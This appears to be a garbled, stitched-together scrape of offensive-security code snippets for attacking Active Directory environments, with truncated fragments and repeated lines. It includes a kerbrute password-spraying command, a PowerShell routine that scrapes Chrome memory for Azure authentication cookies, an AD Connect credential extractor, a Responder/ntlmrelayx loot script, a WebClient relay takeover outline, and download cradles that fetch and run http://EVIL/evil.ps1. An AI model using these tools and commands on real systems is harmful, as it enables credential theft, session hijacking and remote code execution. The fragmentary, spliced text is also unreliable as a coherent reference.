With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# This scriplet relies on https://github.com/glmcdona/strings2 | |
# Import the script: PS> import-module .\Process_String_Extractor.ps1 | |
# Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World" | |
# To extract Cookies for O365 / Azure PTC Attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie" | |
function ScrapeProcessMemory { | |
Param( | |
[Parameter(Mandatory)] | |
[string]$Processname, | |
[Parameter(Mandatory)] |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#Thank you @NotMedic for troubleshooting/validating stuff! | |
$password = Read-Host -Prompt "Enter Password" | |
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
$CASERVER = "alexlab-dc01-ca" #CA name. | |
$CA = $CAFQDN + "\" + $CASERVER |
This is a little guide that helps you to "proxify" a VMware Fusion virtual machine on macOS. This can be useful if you want to isolate and analyse web traffic to/from an application by running it in a VM.
vmnet3
) to VMware Fusion
sudo vi /Library/Preferences/VMware\ Fusion/networking
answer VNET_1_HOSTONLY_SUBNET 172.16.92.0
answer VNET_1_VIRTUAL_ADAPTER yes
answer VNET_1_VIRTUAL_ADAPTER_ADDR 172.16.92.1
+answer VNET_3_DHCP yes
+answer VNET_3_DHCP_PARAM_DNS_ADDR 172.16.12.1
+answer VNET_3_DHCP_PARAM_ROUTERS 172.16.12.1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" | |
try { | |
$client.Open() | |
} catch { | |
Write-Host "[!] Could not connect to localdb..." | |
return |
#!/bin/bash | |
# This script assumes Responder is in /opt/Responder | |
# Error messages begone! | |
exec 2>/dev/null | |
# Hardcoded location for script output files | |
OUTDIR=${HOME}'/working/loot/gathered' | |
# Hardcoded location for ntlmrelayx's .sam file output directory | |
NTLMRELAY=${HOME}'/working/loot/ntlmrelay' |
using System; | |
using System.IO; | |
using System.Net; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |